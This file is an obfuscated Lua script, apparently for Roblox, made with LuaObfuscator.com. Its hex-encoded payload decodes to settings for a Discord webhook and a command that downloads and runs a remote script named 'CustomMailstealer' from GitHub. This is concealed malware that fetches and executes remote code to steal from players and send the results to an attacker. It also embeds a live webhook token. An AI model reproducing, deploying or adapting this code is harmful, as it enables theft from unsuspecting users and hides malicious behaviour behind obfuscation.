--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v30,1,1));return "";end end else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v30,16));if v19 then local v96=v5(v69,v19);v19=nil;return v96;else return v69;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v70-(v70%((2703 -(68 + 997)) -(1523 + (1384 -(226 + 1044))))) ;else local v71=(2 + 0)^(v32-1) ;return (((v31%(v71 + v71))>=v71) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -(2 + 0)) ;return (v40 * (3720433 + 13056783)) + (v39 * (65886 -(87 + 263))) + (v38 * (1213 -(892 + 65))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=2 -1 ;local v44=(v20(v42,1 + 0 ,20) * (((25 -(10 + 8)) -5)^(984 -(802 + 150)))) + v41 ;local v45=v20(v42,56 -35 ,55 -(92 -68) );local v46=((v20(v42,24 + 8 )==((1440 -(416 + 26)) -((2921 -2006) + 82))) and  -(2 -1)) or 1 ;if (v45==(0 + 0)) then if (v44==(0 -0)) then return v46 * (1187 -(1069 + 118)) ;else v45=2 -1 ;v43=0 -(0 + 0) ;end elseif (v45==(356 + 1691)) then return ((v44==0) and (v46 * ((1 -0)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((793 -(368 + 423))^(163 -111)))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -(439 -(145 + 293)) );v18=v18 + v47 ;local v49={};for v65=431 -(44 + 386) , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v50~=1) then else local v72=0 + 0 ;while true do if (v72~=(851 -(20 + 830))) then else v50=2;break;end if (v72~=(0 -0)) then else v53=nil;v54=nil;v72=1;end end end if (v50==(870 -(550 + 317))) then v57=nil;while true do local v78=0;while true do if (v78==(1 -0)) then if (v51==(1 -0)) then local v101=0 + 0 ;while true do if (v101~=(0 -0)) then else v56=v23();v57={};v101=1 -0 ;end if (v101==(287 -(134 + 151))) then v51=1 + 1 ;break;end if ((1 + 0)==v101) then for v117=1666 -(970 + 695) ,v56 do local v118=0 -0 ;local v119;local v120;local v121;local v122;while true do if (v118==(1990 -(582 + 1408))) then v119=0;v120=nil;v118=2 -1 ;end if ((6 -4)==v118) then while true do if (v119==(0 -0)) then local v164=1551 -(1126 + 425) ;while true do if ((1 -0)~=v164) then else v119=3 -2 ;break;end if ((0 -0)==v164) then v120=0;v121=nil;v164=1122 -(118 + 1003) ;end end end if (v119==(2 -1)) then v122=nil;while true do if (v120==(1825 -(1195 + 629))) then if (v121==1) then v122=v21()~=0 ;elseif (v121==2) then v122=v24();elseif (v121==(3 -0)) then v122=v25();end v57[v117]=v122;break;end if (v120==(241 -(187 + 54))) then local v176=780 -(162 + 618) ;while true do if (v176~=(4 -3)) then else v120=1 + 0 ;break;end if ((0 + 0)==v176) then local v177=0 + 0 ;while true do if (v177==(977 -(553 + 424))) then v121=v21();v122=nil;v177=1;end if (v177~=(1 -0)) then else v176=1 -0 ;break;end end end end end end break;end end break;end if (v118~=(1 -0)) then else v121=nil;v122=nil;v118=1 + 1 ;end end end v55[2 + 1 ]=v21();v101=2;end end end break;end if (v78==(1636 -(1373 + 263))) then if (v51~=2) then else local v102=1000 -(451 + 549) ;while true do local v105=0 + 0 ;while true do if (v105==0) then if (v102==(1 -0)) then return v55;end if (v102==(0 -0)) then local v154=0;while true do if (1==v154) then v102=1385 -(746 + 638) ;break;end if (v154==(0 + 0)) then for v165=1,v23() do local v166=0 -0 ;local v167;local v168;local v169;local v170;while true do if (v166==1) then v169=nil;v170=nil;v166=1 + 1 ;end if (v166==2) then while true do if (v167==0) then local v178=0 -0 ;while true do if ((1 + 0)~=v178) then else v167=342 -(218 + 123) ;break;end if ((1581 -(1535 + 46))==v178) then v168=1329 -(797 + 532) ;v169=nil;v178=1 + 0 ;end end end if (v167==1) then v170=nil;while true do if (v168==(0 + 0)) then v169=0 -0 ;v170=nil;v168=1203 -(373 + 829) ;end if (v168~=(1 + 0)) then else while true do if (v169==(560 -(306 + 254))) then v170=v21();if (v20(v170,1 + 0 ,1 -0 )~=(1130 -(369 + 761))) then else local v179=1467 -(899 + 568) ;local v180;local v181;local v182;while true do if ((2 + 0)==v179) then if (v20(v181,2 -1 ,604 -(268 + 335) )~=(291 -(60 + 230))) then else v182[574 -(426 + 146) ]=v57[v182[3 -1 ]];end if (v20(v181,2,1 + 1 )~=(239 -(64 + 174))) then else v182[1459 -(282 + 1174) ]=v57[v182[814 -(569 + 242) ]];end v179=8 -5 ;end if (v179==(1 + 2)) then if (v20(v181,3 -0 ,3)==1) then v182[1 + 3 ]=v57[v182[340 -(144 + 192) ]];end v52[v165]=v182;break;end if (v179~=(1024 -(706 + 318))) then else local v184=0;local v185;while true do if (v184==(1251 -(721 + 530))) then v185=1271 -(945 + 326) ;while true do if (v185==1) then v179=1;break;end if (0==v185) then local v194=0;while true do if (v194~=(1 + 0)) then else v185=1;break;end if (v194~=(0 -0)) then else v180=v20(v170,2 + 0 ,703 -(271 + 429) );v181=v20(v170,4 + 0 ,3 + 3 );v194=1501 -(1408 + 92) ;end end end end break;end end end if (v179==(1087 -(461 + 625))) then local v186=1288 -(993 + 295) ;local v187;while true do if (v186~=0) then else v187=0 + 0 ;while true do if (v187==(1171 -(418 + 753))) then local v195=0;while true do if ((1 + 0)==v195) then v187=1 + 0 ;break;end if (v195~=(0 + 0)) then else v182={v22(),v22(),nil,nil};if (v180==(0 + 0)) then local v196=529 -(406 + 123) ;local v197;local v198;while true do if ((1770 -(1749 + 20))==v196) then while true do if (v197~=(0 + 0)) then else v198=0 + 0 ;while true do if (v198==(1322 -(1249 + 73))) then v182[859 -(564 + 292) ]=v22();v182[4]=v22();break;end end break;end end break;end if (v196==0) then v197=0;v198=nil;v196=1 + 0 ;end end elseif (v180==(1146 -(466 + 679))) then v182[3]=v23();elseif (v180==(306 -(244 + 60))) then v182[6 -3 ]=v23() -((5 -3)^(1916 -(106 + 1794))) ;elseif (v180==3) then local v201=476 -(41 + 435) ;local v202;local v203;while true do if (v201~=(1 + 0)) then else while true do if ((0 + 0)~=v202) then else v203=0 -0 ;while true do if (v203~=(0 + 0)) then else v182[7 -4 ]=v23() -(2^16) ;v182[2 + 2 ]=v22();break;end end break;end end break;end if (v201~=0) then else v202=114 -(4 + 110) ;v203=nil;v201=585 -(57 + 527) ;end end end v195=1428 -(41 + 1386) ;end end end if ((104 -(17 + 86))~=v187) then else v179=2;break;end end break;end end end end end break;end end break;end end break;end end break;end if ((0 + 0)~=v166) then else v167=0 -0 ;v168=nil;v166=1;end end end for v171=268 -(176 + 91) ,v23() do v53[v171-1 ]=v28();end v154=1;end end end break;end end end end if (v51==0) then local v103=0 -0 ;local v104;while true do if (v103~=0) then else v104=0;while true do if (v104~=(167 -(122 + 44))) then else v54={};v55={v52,v53,nil,v54};v104=2;end if (v104==(1 + 1)) then v51=3 -2 ;break;end if (v104~=(0 -0)) then else local v155=65 -(30 + 35) ;while true do if (v155==(3 -2)) then v104=1 + 0 ;break;end if (v155==(1257 -(1043 + 214))) then v52={};v53={};v155=3 -2 ;end end end end break;end end end v78=1 -0 ;end end end break;end if (v50==(1214 -(323 + 889))) then local v73=0 + 0 ;while true do if (v73==(2 -1)) then v50=583 -(361 + 219) ;break;end if (v73==(320 -(53 + 267))) then v55=nil;v56=nil;v73=1 + 0 ;end end end if (v50==(413 -(15 + 398))) then local v74=0;while true do if (v74==1) then v50=983 -(18 + 964) ;break;end if (v74~=(0 -0)) then else v51=1227 -(322 + 905) ;v52=nil;v74=612 -(602 + 9) ;end end end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...)local v79=v62;local v80=v63;local v81=v64;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=4) then if (v92<=1) then if (v92>0) then v89[v91[2]]();else v89[v91[2]]=v91[3];end elseif (v92<=2) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v60[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v60[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v60[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v60[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v60;else v89[v91[2]]=v60[v91[3]];end v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v60;else v89[v91[2]]=v60[v91[3]];end elseif (v92>3) then local v129;local v130,v131;local v132;v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v132=v91[2];v130,v131=v82(v89[v132](v13(v89,v132 + 1 ,v91[3])));v84=(v131 + v132) -1 ;v129=0;for v149=v132,v84 do v129=v129 + 1 ;v89[v149]=v130[v129];end v83=v83 + 1 ;v91=v79[v83];v132=v91[2];v89[v132]=v89[v132](v13(v89,v132 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];do return;end else do return;end end elseif (v92<=6) then if (v92==5) then local v112=0;local v113;while true do if (v112==0) then v113=v91[2];v89[v113]=v89[v113](v13(v89,v113 + 1 ,v84));break;end end else v60[v91[3]]=v89[v91[2]];end elseif (v92<=7) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v60;else v89[v91[2]]=v60[v91[3]];end elseif (v92>8) then local v141=0;local v142;local v143;while true do if (v141==1) then v89[v142 + 1 ]=v143;v89[v142]=v143[v91[4]];break;end if (v141==0) then v142=v91[2];v143=v89[v91[3]];v141=1;end end else local v144=0;local v145;local v146;local v147;local v148;while true do if (v144==2) then for v162=v145,v84 do local v163=0;while true do if (v163==0) then v148=v148 + 1 ;v89[v162]=v146[v148];break;end end end break;end if (0==v144) then v145=v91[2];v146,v147=v82(v89[v145](v13(v89,v145 + 1 ,v91[3])));v144=1;end if (v144==1) then v84=(v147 + v145) -1 ;v148=0;v144=2;end end end v83=v83 + 1 ;end end;end if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O0003073O007365726E616D65030C3O002O695F4A616E78617669657203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132303137393836383235302O3139333732382F4A2O6B766C7633553932363576366145315133494C6F677A6259663134415679556C51694144577A66394B7361723554685845346C47564167373844565F4B7A4D663653030F3O00475F4C6F6164696E675363722O656E03153O005761697420596F7527726520496E20536372697074030D3O00475F576562682O6F6B4E616D6503023O00657A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657200103O0012023O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00083O00124O00073O00124O00093O00122O0001000A3O00200900010001000B0012040003000C6O000100039O0000026O000100016O00017O00",v9(),...);
